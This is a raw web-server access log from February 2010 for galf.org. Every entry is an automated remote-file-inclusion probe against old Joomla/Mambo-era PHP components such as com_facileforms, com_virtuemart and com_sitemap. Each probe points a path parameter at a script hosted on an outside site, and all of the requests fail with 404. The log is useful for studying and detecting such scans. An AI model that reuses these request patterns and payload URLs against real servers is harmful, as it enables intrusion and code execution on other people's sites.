211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_091228.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_090817.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_091130.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_090824.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_091012.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:19 -0800] "GET /logs/access_091019.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:52:46 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:52:46 -0800] "GET /logs/access_091221.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:22:53:34 -0800] "GET /logs/access_100111.log%20%20//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:22:53:34 -0800] "GET /logs//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:22:53:34 -0800] "GET /component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:53:38 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:53:38 -0800] "GET /logs/access_091221.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:22:55:26 -0800] "GET /logs/access_100215.log%20%20//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:22:56:37 -0800] "GET /logs/access_100111.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:22:56:52 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:22:56:52 -0800] "GET /logs/access_100118.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:22:56:52 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:22:57:12 -0800] "GET /logs/access_100222.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:22:57:34 -0800] "GET //vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:22:57:34 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:22:57:42 -0800] "GET /logs/access_100222.log///vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.137.162 - - [28/Feb/2010:22:59:51 -0800] "GET /logs/access_100125.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:06 -0800] "GET /logs/access_091228.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
195.190.166.35 - - [28/Feb/2010:23:00:14 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [28/Feb/2010:23:00:14 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:18 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:18 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
186.28.232.13 - - [28/Feb/2010:23:00:18 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
216.119.103.12 - - [28/Feb/2010:23:00:58 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:23:00:58 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:23:00:58 -0800] "GET /logs/access_090914.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:23:01:01 -0800] "GET /logs/access_100125.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:23:02:04 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:23:02:05 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:02:07 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:02:08 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:02:09 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
75.119.216.146 - - [28/Feb/2010:23:02:15 -0800] "GET /logs/access_100215.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [28/Feb/2010:23:02:17 -0800] "GET /logs/access_090817.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:02:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
203.84.249.82 - - [28/Feb/2010:23:02:31 -0800] "GET /logs/access_091214.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:23:02:31 -0800] "GET /logs/access_091019.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:23:02:31 -0800] "GET /admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:23:02:31 -0800] "GET /logs//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:23:04:50 -0800] "GET /logs/access_091102.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:02 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:02 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:02 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:09 -0800] "GET /logs/access_091109.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [28/Feb/2010:23:05:13 -0800] "GET /logs/access_091228.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_090824.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_091012.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_091019.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_090817.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_091228.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_091207.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:05:14 -0800] "GET /logs/access_091130.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [28/Feb/2010:23:05:15 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "galf.org"
195.190.166.35 - - [28/Feb/2010:23:05:15 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "galf.org"
195.190.166.35 - - [28/Feb/2010:23:05:18 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:37 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:37 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:41 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:41 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:41 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:47 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:05:49 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:02 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:10 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:27 -0800] "GET /help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:27 -0800] "GET /logs/access_100208.log%20%20/help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:27 -0800] "GET /logs/help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:23:06:32 -0800] "GET /logs/access_100111.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:33 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:33 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:36 -0800] "GET /logs/help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:36 -0800] "GET /help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:23:06:36 -0800] "GET /logs/access_100208.log%20%20/help.php?css_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:38 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:06:38 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:36 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:36 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:39 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:39 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:53 -0800] "GET /logs/access_100125.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:07:55 -0800] "GET /logs/access_100125.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:08:00 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:08:13 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:08:21 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:23:08:36 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:10:13 -0800] "GET /logs/access_091221.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:10:14 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:10:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
78.110.50.120 - - [28/Feb/2010:23:10:58 -0800] "GET /logs/access_100125.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:11:01 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:11:05 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:11:06 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:23:11:51 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:11:56 -0800] "GET /logs/access_091207.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
